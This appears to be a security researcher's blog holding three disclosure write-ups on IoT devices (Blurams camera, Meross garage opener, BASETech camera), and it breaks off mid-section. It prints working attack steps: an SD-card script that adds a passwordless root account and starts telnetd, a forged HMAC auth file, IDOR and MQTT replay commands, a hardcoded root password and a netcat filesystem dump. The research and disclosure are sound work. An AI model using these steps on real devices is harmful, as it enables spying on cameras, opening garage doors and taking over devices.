Blurams Lumi Security Camera analysis

Continuing the series of analyses of cloud-enabled devices (see the BASETech IP camera and Meross Garage Door Opener posts for previous research), we have taken a look at the Blurams Lumi Security Camera (A31C). This research and blog post were created in collaboration with my coworker Arne. This particular device is marketed as a 2-way camera, allowing someone to press a button on the camera to establish live communication with the owner (e.g. for helping children or the elderly). The video and controls are accessed through a mobile application as well as a web client, and of course the video stream can be viewed and the device controlled from anywhere in the world. A second device without the 2-way feature was also purchased (A31).

This is a rather long blog post; if you are only interested in the vulnerabilities, you can skip right to that chapter. The vulnerabilities were closed by Blurams before the publication of this post.

Recon

To get the device working we first needed to install the “blurams” mobile application and register an account. For the purpose of this analysis a main account was created to which the camera was paired. Other accounts without any paired device were also created.

After that, logged in to the mobile application with the primary account, the WiFi credentials are entered and the app generates a QR code; this code is then scanned by the camera, which joins the WiFi.

Interestingly, this QR code appears to be encrypted. The content of this code is this (hexdump view):

This QR code might also contain the account ID of the user, since the mobile application appears to never communicate with the camera directly. The camera connects to the WiFi, obtains an IP address through DHCP and immediately connects to the Blurams cloud infrastructure, encrypting all communication. Following is a capture of the initial Wireshark dump during and after the setup of the device.

Once connected to the network, the first step is to enumerate open ports. This device, however, exposes none:
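For reference, a scan along these lines (the camera’s IP is a placeholder) came back empty:

# scan every TCP port
nmap -p- -T4 192.168.0.23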

All further communication with the device is routed through the cloud infrastructure of Blurams. The device uses STUN to allow the mobile application to communicate with it. Even if such a device is deployed behind a firewall which blocks all inbound access, STUN makes it possible to remotely access it.

Investigating the web client

There is a web client available through https://client.blurams.com/ which can be used to stream the video and control the device. This client is particularly interesting since it is trivial to intercept its traffic via Burp Suite.

The camera paired to our primary account already appears in it. The video can be viewed live, and if enabled (by default it is not) the cloud-stored video can be viewed as well.

Most of the communication uses REST-style endpoints; for example, here the list of all paired devices is loaded by the web client:

Included in this response is the device ID of our camera: xxxxS_a0ff22435471

xxxxS_ appears to be a static prefix and a0ff22435471 is simply the MAC address of the device.

Once a live view of the stream is started, a WebSocket connection is initiated like this:

Through the WebSocket connection the client then sends the following request:

The payload of the request is Base64 encoded, but in a strange way. The first 10 characters are encoded separately, in this case resulting in 1424276. The remainder is a single encoded block of JSON data which has been cut in the middle and reversed, resulting in this:

":"720p","deviceName":"","clientId":"WEBCLIENT_H5_80424545391278391689940921836",
"shareId":"","relayServer":"10.150.2.147:50921","isSDCardPlayback":"false",
"preConnect":"false","releaseVersion":"","isSupportWASM":"1"}{"requestTime":
"1689940921836","productKey":"1cad3c83-d87","deviceId":"xxxxS_a0ff22435471",
"channelNo":"","token":"a4ef7ff88eb845fe99826d78922a3a8e","hasAudio":"true",
"region":"","isPermanentStorage":"false","channel

Changing the token in this request to the token of another user did not allow them to view the video stream; the backend handles this correctly. Requesting cloud-stored videos works in a similar way: although not done via WebSocket, the same _paramStr_ format is used to retrieve that data, and the token is also checked correctly in that instance.

Looking back at the initial view of the devices paired with the account, it turns out that the preview image is not retrieved in the same way. The preview is fetched like this:

The URL parameters after the token can be ignored, as they appear to have no function. Simply accessing the following URL loads the preview image: https://vrs-pho-oci.blurams.com/lookup/thumbnail/xxxxS_a0ff22435471/current?token=a4ef7ff88eb845fe99826d78922a3a8e

The URL effectively contains two parameters: the device ID and the user’s access token. To verify whether permissions are checked here, the token was replaced with the token of a secondary user which did not have any device paired. Surprisingly, the preview image could be retrieved:

The camera uploads a preview image roughly every 13 seconds at a low resolution of 640×360. Since the device ID consists only of a static prefix and the MAC address, it is trivial to enumerate other IDs and gain access to their (almost-)live preview images. For this, the camera only needs to be paired to an account and be able to reach the cloud servers. Even if it is installed behind a firewall and incoming connections to it are blocked, as long as it can upload the images, they can be accessed by anyone.
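For illustration, fetching the thumbnail of a camera comes down to a single request; the device ID below is the redacted example from above, and the token can come from any valid account:

# any valid access token works; the account does not need to own the camera
curl -o preview.jpg \
  "https://vrs-pho-oci.blurams.com/lookup/thumbnail/xxxxS_a0ff22435471/current?token=<any-valid-token>"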

Using this, it is possible to get a semi-live low quality video stream of all currently online cameras. 

Curiously, there is also an endpoint used to get the settings of a device; the request is done like this:

If the provided device ID is paired to the account, this request completes instantly. However, when the account has no devices paired, or if the device ID parameter is simply removed, the request takes more than 10 seconds and returns the data of a single random device, for example:

Thankfully, as far as I can tell, it is not possible to correlate the device ID with the connected SSID this way; the response does not include it. Having the SSID would make locating the physical position of the device much easier.

Getting shell access to the camera

In order to better understand what the camera does, access to the underlying Linux operating system would be preferable.

Through the endpoint /api/device/checkMultiCameraV2 the address of a firmware image could be identified (e.g. https://fw.blurams.com/Device/1cad3c83-d87/A31C_AK_IPC/1/23.0406.435.4120/a31c_f1r03_LV230525.12237_ota.enc), however the image is encrypted.

Having no other means of connecting to the camera, the hardware was investigated next.

While the board does contain UART pins, it was not possible to transmit any data through them. Only the U-Boot boot loader messages could be read from them, and it wasn’t immediately possible to force single user mode.

Instead, to gain initial access to the firmware, the flash chip of the camera was desoldered and dumped.

This worked flawlessly and with that the binaries and configuration could be analyzed.

The file /opt/sh/safe_exec.sh caught our attention. This shell script is configured to be executed on startup by the following code block in /init.d/rcS:

    echo "check factorytest..."
    if [ -d /mnt/sdcard/factorytest ]; then
        echo "start factorytest..."
        cd /mnt/sdcard/factorytest
        /opt/sh/safe_exec.sh ./auth.ini ./factorytest.sh
        exit 0
    fi

The script is as follows:

#########################################################
#
#  auth.ini example:
#
#	KEY=12345678901234567
#	MD5SUM_FILE=test.md5sum
#	MD5SUM_MD5=b757a9fc7aa080272c37902c701e2eb4
#
#########################################################


THISDIR=`dirname $0`
AUTH_FILE=$1
SCRIPT_FILE=$2

exit_with_msg()
{
	echo "$2"
	exit $1
}

check_auth()
{
	[ x"$1" = x"" ] && return 0
	[ -f "$1" ] || return 0
	${THISDIR}/../bin/ukey -t "$1" > /dev/null 2>&1
}

check_emergy_key()
{
    KEY=`grep "KEY=" "$1" | cut -d'=' -f2 | cut -d'e' -f2`
    P1=`cut -d'.' -f1 /etc/version`
    P2=`cut -d'.' -f2 /etc/version`
    P3=`cut -d'.' -f3 /etc/version`
    AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`
    AUTH2=`expr ${AUTH1} \* ${AUTH1}`
    test ${AUTH2} = ${KEY}
}

[ x"${AUTH_FILE}" = x"" ] && exit_with_msg 1 "no auth file"
[ x"${SCRIPT_FILE}" = x"" ] && exit_with_msg 1 "no scrip file"

check_emergy_key "${AUTH_FILE}" && {
    echo "fast run ${SCRIPT_FILE} ..."
    sh ${SCRIPT_FILE}
    exit 0
}

check_auth "${AUTH_FILE}" || exit_with_msg 2 "auth file has been changed!"

source "${AUTH_FILE}"
[ x"${MD5SUM_FILE}" = x"" ] && exit_with_msg 3 "no md5sum file"

# get script md5sum
SCRIPT_MD5SUM=`md5sum "${SCRIPT_FILE}" | cut -d' ' -f1`
echo "SCRIPT_MD5SUM=${SCRIPT_MD5SUM}"

# check md5sum of script and other files
AUTH_DIR=`dirname ${AUTH_FILE}`
cd ${AUTH_DIR}
MD5SUM_MD5SUM=`md5sum "${MD5SUM_FILE}" | cut -d' ' -f1`
[ x"${MD5SUM_MD5}" = x"${MD5SUM_MD5SUM}" ] || exit_with_msg 4 "md5sum file has been changed!"
SCRIPT_MD5_COUNT=`grep "${SCRIPT_MD5SUM}" "${MD5SUM_FILE}" | wc -l`
[ x"${SCRIPT_MD5_COUNT}" = x"1" ] || exit_with_msg 5 "script has been changed!"
md5sum -c "${MD5SUM_FILE}" || exit_with_msg 6 "check md5sum failed!"
cd -

echo "check auth ok!"
echo "run ${SCRIPT_FILE} ..." > /dev/null
sh ${SCRIPT_FILE}

The interesting part of this script is the check_emergy_key() function. If it returns true, the shell script passed through $2 gets executed right away (the “fast run” branch). check_emergy_key() really only takes version numbers from /etc/version and does some arithmetic on them. The version of our camera can be easily identified; the endpoint /api/device/checkMultiCameraV2 provides this information.

We can do the same calculations quickly with this shell script:

#!/bin/sh
VERSION='23.0406.435.4120'
P1=`echo $VERSION | cut -d'.' -f1`
P2=`echo $VERSION | cut -d'.' -f2`
P3=`echo $VERSION | cut -d'.' -f3`
AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`
AUTH2=`expr ${AUTH1} \* ${AUTH1}`
echo $AUTH2

With that version configured, this generates the “key” with the value 893711025. Armed with that information, the folder /factorytest is created on an otherwise empty FAT32-formatted SD card. In it, the following auth.ini file is placed:

KEY=893711025

And the following factorytest.sh file:

#!/bin/sh

echo 'toor:x:0:0:root:/:/bin/sh' >> /etc/passwd
echo 'toor::15874:0:99999:7:::' >> /etc/shadow

telnetd &

The supplied shell script creates a secondary root account named toor without a password and starts telnetd. Putting that SD card into the camera and rebooting it gives us our root shell via telnet:

Using this access it was then possible to also decrypt the initially identified firmware update file via the main binary of the camera.

For our research this data was not strictly necessary anymore; with shell access we could read the files directly anyway.

Getting shell access to the camera on version 2.3.38.12558

After disclosing the SD card vulnerability to Blurams, they rolled out a new version and asked if we could take a look at the fix as well. Curious as to how it was solved, we started to investigate again. Using the API, the URL to the firmware could be retrieved once more (https://fw.blurams.com/Device/1cad3c83-d87/A31C_AK_IPC/2/2.3.38.12558/a31c_f1r03_LV231215.12558_ota.enc); this was again an encrypted file.

Since we still had access to the device, we could decrypt this file on the camera. After decrypting and unpacking the files, we can see the new safe_exec.sh script:

#########################################################
#
#  auth.ini example:
#
#       KEY=12345678901234567
#       MD5SUM_FILE=test.md5sum
#       MD5SUM_MD5=b757a9fc7aa080272c37902c701e2eb4
#
#########################################################


THISDIR=`dirname $0`
AUTH_FILE=$1
SCRIPT_FILE=$2

exit_with_msg()
{
        echo "$2"
        exit $1
}

check_auth()
{
        [ x"$1" = x"" ] && return 1
        [ -f "$1" ] || return 1
        ${THISDIR}/../bin/ukeyHmacRead -t "$1" > /dev/null 2>&1
}

# check_emergy_key()
# {
#     KEY=`grep "KEY=" "$1" | cut -d'=' -f2 | cut -d'e' -f2`
#     P1=`cut -d'.' -f1 /etc/version`
#     P2=`cut -d'.' -f2 /etc/version`
#     P3=`cut -d'.' -f3 /etc/version`
#     AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`
#     AUTH2=`expr ${AUTH1} \* ${AUTH1}`
#     test ${AUTH2} = ${KEY}
# }

[ x"${AUTH_FILE}" = x"" ] && exit_with_msg 1 "no auth file"
[ x"${SCRIPT_FILE}" = x"" ] && exit_with_msg 1 "no scrip file"

# check_emergy_key "${AUTH_FILE}" && {
#     echo "fast run ${SCRIPT_FILE} ..."
#     sh ${SCRIPT_FILE}
#     exit 0
# }

check_auth "${AUTH_FILE}" || exit_with_msg 2 "auth file has been changed!"

source "${AUTH_FILE}"
[ x"${MD5SUM_FILE}" = x"" ] && exit_with_msg 3 "no md5sum file"

[...]

We can see that the vulnerable check_emergy_key() function has been commented out, and instead a new binary was included in the firmware: ukeyHmacRead

The auth.ini file path is passed as a parameter to ukeyHmacRead to perform some check. If this does not fail, then source "/mnt/sdcard/factorytest/auth.ini" is executed. Since we control the content of auth.ini, this gives us code execution. We only need to make sure that the ukeyHmacRead -t "/mnt/sdcard/factorytest/auth.ini" command does not fail.

We copied the new binary to the still-rooted device and later started to emulate it using QEMU to figure out what it does. It appears to calculate and check an HMAC inside the file. From analyzing the binary it’s clear that it now expects a KHMAC entry inside the auth.ini file.

After figuring out that the key needs to be at the end of the file and that the file needs to contain at least a certain amount of data, the tool itself could be used to calculate the correct key for a file.
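For illustration only: the 64 hex characters of the KHMAC value suggest a SHA-256 based HMAC. Assuming it is computed over the file content preceding the KHMAC line, keyed with the static key embedded in ukeyHmacRead (both assumptions), the value could be reproduced like this once the key is extracted:

# hypothetical: static key recovered from the ukeyHmacRead binary
KEY='<static key from the binary>'
# HMAC-SHA256 over everything except the KHMAC line
sed '/^KHMAC=/d' auth.ini | openssl dgst -sha256 -hmac "$KEY"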

Using this, a new auth.ini file can be created to exploit the new firmware to gain a root shell on the device. On an SD card the file /factorytest/exploit.sh is placed with the following content:

#!/bin/sh

echo 'toor:x:0:0:root:/:/bin/sh' >> /etc/passwd
echo 'toor::15874:0:99999:7:::' >> /etc/shadow

telnetd &

And the file /factorytest/auth.ini is placed on it with this content:

KEY=12345
/mnt/sdcard/factorytest/exploit.sh
KHMAC=6213ddd1e497593bfe4f2cb25af5e47eaaef69196d45c22678e06cbde54cff84

Armed with this knowledge, the device was updated to the latest firmware version. After that, the SD card was inserted and the device rebooted; a few seconds later the exploit executed and telnet was available again.

Having access to the device and being able to decrypt the firmware update file allowed us to gain access to the ukeyHmacRead binary very quickly. It should be noted that without this access, an attacker could again desolder and dump the flash memory to access the files. Using this shortcut just saved us a lot of time.

Vulnerabilities

This is the condensed list of vulnerabilities identified during this research in order of appearance. At the time of publishing this article, all of the vulnerabilities have been fixed.

1. Unauthorised access to camera feed thumbnails

The cameras upload a lower-resolution thumbnail (usually 640×360) roughly every 13 seconds. These thumbnails can be accessed by providing any valid access token; it is not verified whether the access token belongs to an account paired with the camera. Creating an account to get a token is free and does not require the purchase of a camera.

The camera ID required for access is based on the MAC address of the device and can therefore be trivially enumerated.

With that, it was possible for anyone to access the thumbnail image of any camera that was currently online.

2. Code execution through SD card (CVE-2023-50488)

By abusing a factory test script on the device, it is possible to execute arbitrary commands on the device as the root user.

The key which should protect this function is based only on the software version string of the device. These version strings are generally publicly known. The key can therefore be calculated and the factory test function abused to gain code execution on the device.

Placing two files on an SD card, inserting the SD card into the device and rebooting it will execute an attacker-provided shell script with root privileges (see examples on GitHub). This potentially affects all devices up to and including firmware version 23.0406.435.4120.

3. Code execution through SD card (CVE-2023-51820)

Again by abusing a factory test script on the device, it is possible to execute arbitrary commands on the device as the root user.

The key has been moved from being calculated based on the version string to a static key inside a binary. Once that key is obtained, a file can be forged that allows code execution on all devices running this firmware version.

Placing two files on an SD card, inserting the SD card into the device and rebooting it will execute an attacker-provided shell script with root privileges (see examples on GitHub). This only affects devices with firmware version 2.3.38.12558 installed.

Conclusion

Due to time constraints, this is as far as our investigation goes. Ultimately we were unable to access the HD video stream; access was only possible to the semi-live preview images of the video streams.

Overall we were surprised by the sophistication of this relatively cheap device. Communication is for the most part encrypted, no services are exposed via the network, an update mechanism exists, and via UART it was not trivially possible to boot into single user mode.

We hope that this groundwork enables other researchers to further investigate these devices. We haven’t even started to look at the mobile apps or the main camera binary.

Working with Blurams, once a communication channel was established, has been great. They were interested in fixing the reported vulnerabilities, asked us to check their remediations and adopted our recommendations.

Disclosure timeline

2023-11-03: Vulnerabilities initially identified, first attempt to contact Blurams (via email)
2023-11-14: Second attempt to contact Blurams (via email)
2023-11-23: Third attempt to contact Blurams (on Twitter)
2023-12-04: Another attempt to contact Blurams (via email and Twitter)
2023-12-07: Blurams acknowledges the vulnerabilities
2023-12-16: Blurams lets us know that the issues are fixed and asks if we can verify
2023-12-18: We verify that the thumbnails can no longer be accessed but point out a new problem with the SD card remediation
2023-12-29: Blurams acknowledges again and asks us to verify a new implemented fix
2024-01-02: We verify that the SD card vulnerability is now also fixed
2024-02-01: Public disclosure

Meross Smart Wi-Fi Garage Door Opener analysis

Intro

This post is another research project I conducted while in COVID-19 lockdown. The Meross Smart Wi-Fi Garage Door Opener (MSG100, firmware version 3.1.15, hardware version 3.5.0) is a retrofit module for your existing garage door opener. The device is connected to your network via wireless LAN and allows you to trigger open or close requests through a mobile application. You do not have to be in the same local network for this to work; you can close, open or view the status from anywhere in the world.

This is a rather long blog post; if you are only interested in the vulnerabilities, you can skip right to that chapter. The vulnerabilities have been closed by Meross since the publication of this post.

Practically, the device acts as a remote-controlled button. If you press the open or close function in the mobile application, the device simply closes an electrical circuit which should be connected to the existing garage opener. Closing that circuit tells the garage door to close or open. The device also includes a sensor to check whether the door is closed. Power is provided through a USB connector.

After identifying vulnerabilities in this device I also verified that they affect at least the Meross Smart Wi-Fi Plug (MSS210, firmware version 5.1.1, hardware version 5.0.0). Possibly all devices which use this platform could be affected by this.

Recon

To set up the device the Meross mobile app is required. To use it, we need to first create a new account.

Afterwards we can start to add the new device to our account. The app guides us through this setup. When the device first boots up it opens a wireless LAN hotspot. The mobile app instructs us to connect to it.

During this setup a secret key is deployed on the device. This key appears to be specific to the logged-in user.

After that setup, the device now connects to the provided wireless network and is ready to use. As the device is now part of the network, the first step was to run a port scan against it:

The device only opens one port: it accepts HTTP requests on port 80. Simply requesting anything from it did not work, and running any sort of directory brute-force tool against it reliably crashed the device.

Next, an iPhone was set up to send all traffic through an interception proxy, and the application was used while connected to the same network. In this state, the mobile app uses the web server on the device directly to communicate with it.

As can be seen in the screenshot, the message the web server accepts is JSON formatted and contains a payload as well as a header section. The header always contains a “sign” field, a signature computed with the previously deployed secret key. Any change to the message is detected and the system does not execute it:

In the above case the timestamp was tampered with, and the device correctly rejected the message. Interestingly, it appears that only the content of the header is signed, but not the payload. Replaying the message with a modified “open” field in the payload does get executed:

This means that if an attacker captures the request to close the garage door, that message can be altered to open the garage (or vice versa). It also reveals that the device has no protection against replay attacks at all. The header includes a “timestamp” field which is part of the signature, but it is not verified that the timestamp lies within an acceptable time frame. Even a day-old message can be replayed and will be executed by the device.
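To illustrate the replay, a captured message can simply be POSTed back to the device. A sketch, assuming the /config path used by the public MerossIot client library (device IP is a placeholder):

# re-send a previously captured, signed message; even day-old captures are accepted
curl -X POST 'http://192.168.1.20/config' \
  -H 'Content-Type: application/json' \
  --data @captured_message.json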

Next the iPhone was moved to a different network to simulate the “open from anywhere” functionality. When doing so, the interception proxy did not capture any traffic that contained messages to open the garage door.

Capturing the network traffic at that point showed that the app communicates outbound on port 443 with the host “54.77.214.248”; the traffic was encrypted, but it was not HTTPS:

The hostname “mqtt-eu.meross.com” already gave a hint that it’s using the MQTT protocol.

Investigating the MQTT server

The Meross MQTT details have already been investigated by others; I found the GitHub repositories albertogeniola/MerossIot and Apollon77/meross-cloud extremely helpful. Basically, to connect to the Meross MQTT server we need the following:

  • Username: the internal user ID assigned by Meross to our account
  • Password: the user ID concatenated with the secret key, hashed with MD5
  • Client ID: a specific string in the form of “app:<any md5-sum>”
  • Topic(s) to subscribe to: topic names were already part of the HTTP messages

All of this is easily obtainable: logging in with the mobile application gives us both the user ID and the secret key:

Using the secret key we can create the password:

echo -n '1245194654bb6420ca3756d09030059deb828ad' |md5sum
774b1d8d8dfc2f38ffe78f93676a81e7  -

With this information we can now connect to the Meross MQTT server. I couldn’t figure out why, but I didn’t manage to connect through “mosquitto_sub“. Instead I used MQTT Explorer which worked without any problems.

The connection to the MQTT server will be made as the user “1245194“. This account was created solely for this purpose and never had a device enrolled or attached to it.

We use the following connection details:

As the client ID we set “app:ca09923818dd826a8c09c702877db82b” and that is all that is required to generally connect.

The structure of the topics was found through the albertogeniola/MerossIot GitHub repository. Each user on the platform has their own MQTT topic in the form of “/app/<$userID>/subscribe“. In this case, we do not subscribe to our own user ID; instead we subscribe to “1238435” – the user that has the device attached to its account.
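Putting the connection details together, the equivalent mosquitto_sub invocation would look like this (though, as mentioned above, mosquitto_sub refused to connect in my tests; MQTT Explorer with the same parameters worked):

mosquitto_sub -h mqtt-eu.meross.com -p 443 --capath /etc/ssl/certs \
  -i 'app:ca09923818dd826a8c09c702877db82b' \
  -u '1245194' -P '774b1d8d8dfc2f38ffe78f93676a81e7' \
  -t '/app/1238435/subscribe' -v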

The connection with this setup is allowed. When the device is used by its owner, or when the sensors notice a state change, we also receive those messages. For example, when the sensor is triggered from the closed to the open state, the following message is sent to this topic:

{
  "header": {
    "triggerSrc": "DevicePysical",
    "timestampMs": 591,
    "timestamp": 1615975130,
    "sign": "67978ce3534b49079c5cdf5eb0ece248",
    "payloadVersion": 1,
    "namespace": "Appliance.GarageDoor.State",
    "method": "PUSH",
    "messageId": "8d73746387e131c8e09c637989a3a7de",
    "from": "/appliance/2008141004674336100348e1e92b352d/publish"
  },
  "payload": {
    "state": [
      {
        "open": 1,
        "lmTime": 1615975130,
        "channel": 0
      }
    ]
  }
}

In the payload this just tells us that at a specific time the state changed to “1“. The header indicates that this is sent as a “PUSH” message. However, the message contains something much more interesting: the “from” field tells us the ID of the garage opener device which triggered this message.

We reconnect to the MQTT server and this time we also subscribe to the topics “/appliance/2008141004674336100348e1e92b352d/publish” and “/appliance/2008141004674336100348e1e92b352d/subscribe“:

If the real user of the device now triggers an action, we can see the following message in the “/appliance/2008141004674336100348e1e92b352d/subscribe” topic:

{
  "payload" : {
    "state" : {
      "channel" : 0,
      "uuid" : "2008141004674336100348e1e92b352d",
      "open" : 1
    }
  },
  "header" : {
    "messageId" : "12c60e2beb46fb657ed06f96aad701fd",
    "method" : "SET",
    "from" : "\/app\/1238435-94CF07DCAD0730A36B1B895C61B45534\/subscribe",
    "payloadVersion" : 1,
    "namespace" : "Appliance.GarageDoor.State",
    "uuid" : "2008141004674336100348e1e92b352d",
    "sign" : "287965cf84bdf08b557163604acbd247",
    "triggerSrc" : "iOS",
    "timestamp" : 1615976692
  }
}

This is the signed message which was sent to open the garage. It can now be taken and re-sent through the MQTT service to open or close the garage door. Since the payload is not signed, only a single “SET” message must be captured, and as there is no replay protection, this message can be used at any later time.

This absolutely works, resending this message like this:

Triggers the local device to close the door; the device indicates the closing with loud beeping.
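With a client that connects successfully, the replay boils down to publishing the captured JSON to the device’s subscribe topic, e.g. (connection flags as in the subscription sketch above):

# -f sends the file content as the message payload
mosquitto_pub -h mqtt-eu.meross.com -p 443 --capath /etc/ssl/certs \
  -i 'app:ca09923818dd826a8c09c702877db82b' \
  -u '1245194' -P '774b1d8d8dfc2f38ffe78f93676a81e7' \
  -t '/appliance/2008141004674336100348e1e92b352d/subscribe' \
  -f captured_set_message.json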

With these two issues combined, an attacker could capture signed messages over a longer period of time and at some point replay them to open all garage doors that were actively used in the observation time frame.

Vulnerabilities

This is the condensed list of vulnerabilities identified during this research in order of appearance.

1. No replay attack protection (CVE-2021-35067)

The Meross devices accept JSON payloads to trigger actions such as opening or closing garage doors. This JSON is either sent directly via plain-text HTTP to the device, if the mobile app is in the same network, or through MQTT if the mobile app is anywhere else.

The JSON is signed, but no replay protection has been implemented. Additionally, only the header is signed, not the full payload. Even a days-old message can be re-sent to the device, which will execute it. An attacker must only gain access to the close or open message once; they can then re-use it multiple times later.

Due to the incomplete signing of the JSON, a captured message to close the door can be altered to open it.

Update on 2021-06-18: Meross told me they are releasing firmware version 3.2.3 which resolves this. I was not able to verify this yet due to time constraints.

Update on 2021-07-04: I was able to confirm that the vulnerability is closed in version 3.2.3.

2. MQTT server allows access to other devices

The central Meross MQTT server does not check whether the connecting user ID is identical to the user ID whose topic is being subscribed to. Practically, this means that attackers can access the MQTT user ID topics of all users. They only need to guess the user IDs, which are numeric and ascending.

If the real user triggers actions on the device while the attacker is subscribed to the user ID topic, the unique device ID is leaked. Using this, the attacker can then subscribe to the device-specific topics.

If the real user triggers another action, the attacker gains access to the signed message with which that action was triggered. This message can then be replayed as per the previous vulnerability.

Update on 2021-05-30: Meross has fixed this vulnerability.
It is no longer possible to subscribe to topics of other users.

Conclusion

The Meross system contained multiple flaws which, combined, could have given attackers the ability to open garage doors without authorization. The same was possible with Meross smart Wi-Fi plugs; they simply use different device IDs, but the process is exactly the same.

The devices did not protect against replay attacks of any messages.
Additionally, these messages were not protected when the mobile application was used outside of the local network: anyone could subscribe to the MQTT topics on the central Meross MQTT server and gain access to these signed messages.

An attacker could wait to get access to the desired message (open/close or on/off) and replay it at a later time.

After contacting Meross with the details of the vulnerabilities, they responded very quickly and showed an effort to fix them. In the end the MQTT vulnerabilities were completely resolved. Meross also released a new firmware version which should resolve the replay attack vulnerability; however, I could not verify this immediately due to time constraints (Update: I confirmed that this is resolved as well).
However, without the ability to capture the signed messages centrally from the MQTT server, the risk of this vulnerability is greatly reduced even where the replay attack is still possible. An attacker would now need to be in a position to capture network traffic to the garage door opener locally in the network.

Disclosure timeline

2021-03-17: Vulnerabilities initially identified, first attempt to contact Meross
2021-03-20: Sent vulnerability report to correct contact
2021-03-24: Meross acknowledges the vulnerabilities, says they are working on a fix
2021-05-24: Meross releases fixes and invites me to test them
2021-05-30: I retest and confirm the MQTT issue to be fixed, but the replay attack remains unfixed; asked Meross for clarification
2021-06-18: Meross says version 3.2.3 fixes the replay vulnerability
2021-06-18: Publication of this blogpost after 90 days since initial disclosure
2021-06-29: Meross responded that CVE-2021-35067 has been assigned to the replay attack vulnerability
2021-07-04: I was able to confirm that version 3.2.3 fixes the replay attack vulnerability

BASETech IP camera analysis

Intro

This post describes in depth my analysis of the BASETech (GE-131 BT-1837836) IP camera and the vulnerabilities resulting from this research. This is a rather long blog post; if you are only interested in the vulnerabilities, you can skip right to that chapter.

At the time of the analysis the camera had the latest firmware (“20180921”); it appears that this camera has never received a firmware update in its lifetime.

I suspect that this camera is sold under different brands and names across the world. This model is aimed at the German market. BASETech seems to be a low-budget brand primarily sold, and possibly owned, by Conrad.de. If you own a camera that looks similar to this, I’d love to hear from you; contact me.

Recon

The camera does not have any physical interfaces; it only works via wireless LAN. It’s a rather small device and gets its power through USB. The USB port does not transmit any data as far as I can tell.

The camera can only be configured through a mobile phone application (“V12”), and the video stream is viewed via the same app. After configuring WiFi, an initial nmap scan yielded a few interesting results:

The web server only displayed a page about installing a plugin, with a link to an EXE file; that link returned a 404. The telnet service was of course of high interest, but none of the default IoT passwords worked.

Using the mobile application “V12” to connect to the camera first requires you to create an account.

Notably, the blue text “the privacy terms” is not a link; it simply does nothing, and there are no privacy terms you could read. After accepting that you have read them anyway, you can add a device to the app.

To connect, the app needs the device ID and a password. The password field is helpfully pre-filled with “123456”, which is the default password. After connecting to the device, the stream is displayed in a small section of the app.

Interestingly, access to the video stream is possible from outside the network even if the camera is behind a firewall or NAT device. As long as the camera can connect to the internet, the stream can be viewed through the mobile application. For this, the camera connects to a central broker service in China, and the mobile application does the same when trying to access the stream. This is not explicitly stated anywhere, but it means that every camera is publicly reachable as long as outbound connections work, even if inbound access to the camera is restricted.

Opening up the hardware, we can identify connectors on the right-hand side of the board that are very likely UART; they are even labeled accordingly.

Getting a shell on the system

Simply connecting wires to these connectors should be enough, no soldering required!

Using a UART-to-USB adapter we can now connect to that port and see the debug output of the device. Rebooting while attached to the serial port, we can see and interrupt the U-Boot process.

We can get the device to boot into single user mode by simply reading the boot parameters and appending “single” to them.
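In the interrupted U-Boot shell this amounts to roughly the following (the exact bootargs differ per board):

# read the current kernel parameters, then append "single" and boot
printenv bootargs
setenv bootargs "${bootargs} single"
boot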

Booting it up, we get a root shell. The system doesn’t automatically mount the interesting file system and reboots after a few seconds when the camera process does not spawn. So we need to quickly run the init process (“/etc/init.d/rcS“); after that we have a somewhat stable shell with access to the filesystem. From there we immediately grab “/etc/passwd“.

The system is running a small Linux built on BusyBox which is typical for such devices.

Access through telnet

The obtained password hash (“$1$OIqi6jzq$MFDXCYYUxHyGC86C44zRt0“) could not be cracked with any of the usual password lists. But running hashcat against it for around 2 hours on two NVIDIA GTX 1080 Ti cards cracked the password.
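The $1$ prefix identifies md5crypt, which is hashcat mode 500. The exact attack settings are not recorded here, but an invocation along these lines does the job:

# mask attack (-a 3) over lowercase candidates against an md5crypt hash (-m 500)
hashcat -m 500 -a 3 hash.txt '?l?l?l?l?l?l?l?l?l'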

With this password (“laohuqian“) we can now login through telnet as root on the system.

The password is hardcoded and identical across all of these devices. With this password, an attacker on the same network as the camera can compromise it instantly.

Inspecting the data on the camera

With this stable shell through telnet it’s now possible to dump the full filesystem for easier inspection. For this, tar piped through a netcat connection was used.
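A minimal sketch of that technique (IP and port are placeholders):

# on the receiving machine: listen and write the stream into a tar archive
nc -l -p 9999 > camera_fs.tar
# on the camera (BusyBox): pack the filesystem and pipe it out
tar cf - / | nc 192.168.0.10 9999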

Inspecting the contents of the file system yielded some interesting results. As a first step, since we know that the current password is set to “123456“, we can simply search the entire system for that string:

This file is a SQLite database, which can be inspected further:

The password is not hashed; it is stored in plain text. If you change the password, an attacker with filesystem access can retrieve the plain-text password this way. There also appear to be two users configured.
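For reference, such a database can be queried directly with the sqlite3 CLI:

# dump the user table (named USER, as the schema later shows)
sqlite3 user.db 'SELECT * FROM USER;'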

Next, the web server configuration was inspected. It is still unclear what the purpose of this process is. While checking the configuration, the following option was found:

This is a bizarre choice for the DocumentRoot. Essentially it allows anyone with network access to the camera to download arbitrary files from “/etc“. As an example, the root password hash, the device ID, the mentioned SQLite user database as well as the wireless configuration in plain text were retrieved.
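With that DocumentRoot, retrieving the files is one unauthenticated request each (camera IP is a placeholder):

curl http://192.168.0.23/passwd               # root password hash
curl -o user.db http://192.168.0.23/user.db   # plain-text stream credentials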

With this information the video stream can be accessed remotely and access to the Wireless network can be gained as well.

Investigating the device ID

The device ID, which is required to add the camera to the mobile application, was only stored as part of a network configuration (which wasn’t even used on this device), and it was unclear how that ID was generated. It was not stored anywhere else.

Booting the device again with the serial interface attached, the following log message can be found:

The device ID is simply the serial number of the used board. This serial number is sequential and 8 hex characters long, so the device IDs of other cameras can be predicted rather easily; if their owners have not changed the password, you can access their video streams.

Investigating the network traffic

When the camera is connected to the Wireless LAN, it starts by probing for external network connectivity by sending a ping request to “8.8.4.4“:

If external network connectivity is established, the camera sends its device ID and assigned (internal) IP address to a host in China:

That host responds with the external IP address of the camera’s network. When a mobile application connects to the camera, the communication after the initial discovery through the Chinese system is direct, peer to peer. The video stream is never transmitted to the system in China. Most of the communication is done through UDP (more specifically, UDT). The user credentials are sent in plain text and can be captured trivially on any network device between the systems, in this case username “admin” and password “123456“:
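Any sniffer in the path will do; a sketch with tcpdump (interface and address are placeholders):

# -A prints packet payloads as ASCII, exposing the plain-text credentials
tcpdump -i eth0 -A 'udp and host 192.168.0.23'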

Investigating “Default” user

